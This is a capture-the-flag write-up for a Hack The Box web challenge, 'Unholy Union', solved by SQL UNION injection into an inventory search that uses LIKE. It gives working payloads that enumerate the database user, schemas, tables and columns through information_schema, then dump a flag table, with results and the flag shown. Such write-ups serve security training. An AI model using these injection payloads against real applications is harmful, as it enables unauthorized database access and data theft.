Web - Unholy Union

Description

On the outskirts of a forsaken town lies an abandoned warehouse, rumored to store more than just forgotten relics. Locals speak of an unholy union within its database, where spectral data intertwines with the realm of the living. Whispers tell of a cursed ledger that merges forbidden entries through mysterious queries. Some say that the warehouse's inventory system responds to those who know how to merge the right requests. Can you brave the haunted inventory system and unravel the ghostly union of data before the spirits corrupt the world beyond?

Homepage

The challenge name and the query itself says this can be solved through SQL Union Injection

Attack

Table description

First we can search with a to see the table description (a space will match all characters since it's using SQL LIKE operator)

{
    "id": 1,
    "name": "Plumbus",
    "description": "A highly useful multi-purpose tool.",
    "origin": "Planet Schlooch",
    "created_at": "2024-10-22T14:12:33.000Z"
  },

so it's int,str,str,str,date

User

ads'union select 1,user(),"","",NULL-- -

Result:

[
  {
    "id": 1,
    "name": "user@localhost",
    "description": "",
    "origin": "",
    "created_at": null
  }
]

Databases

SELECT * FROM inventory WHERE name LIKE '%ads'union select 1,schema_name,"","",NULL from information_schema.schemata-- -%'

Result

[
  {
    "id": 1,
    "name": "information_schema",
    "description": "",
    "origin": "",
    "created_at": null
  },
  {
    "id": 1,
    "name": "halloween_invetory",
    "description": "",
    "origin": "",
    "created_at": null
  },
  {
    "id": 1,
    "name": "test",
    "description": "",
    "origin": "",
    "created_at": null
  }
]

Our interest lies in halloween_invetory database

Tables

aaa'union select 1,table_schema,table_name,NULL,NULL from information_schema.tables where table_schema="halloween_invetory"-- -

Result:

[
  {
    "id": 1,
    "name": "halloween_invetory",
    "description": "flag",
    "origin": null,
    "created_at": null
  },
  {
    "id": 1,
    "name": "halloween_invetory",
    "description": "inventory",
    "origin": null,
    "created_at": null
  }
]

So there are 2 tables, flag and inventory

Let's get our flag....

Column

SELECT * FROM inventory WHERE name LIKE '%aaa'union select 1, NULL,table_name,column_name,NULL from information_schema.columns where table_name="flag"-- -%'

Result:

[
  {
    "id": 1,
    "name": null,
    "description": "flag", //table name
    "origin": "flag", //column name
    "created_at": null
  }
]

We have 1 column named flag......

Flag

SELECT * FROM inventory WHERE name LIKE '%aaa'union select \
1, flag, NULL, NULL, NULL from halloween_invetory.flag-- -%'
-- so halloween_invetory.flag is database.table (we usually use this way to get 
-- values from other database (if we know db name && table name && column name)
[
  {
    "id": 1,
    "name": "HTB{uN10n_1nj3ct10n_4r3_345y_t0_l34rn_r1gh17?_9c967dbf96425dc2df3b06135f0d003d}",
    "description": null,
    "origin": null,
    "created_at": null
  }
]
//name here is one of the value in column flag 

HTB{uN10n_1nj3ct10n_4r3_345y_t0_l34rn_r1gh17?_9c967dbf96425dc2df3b06135f0d003d}

___________________heapbytes' still pwning

Last updated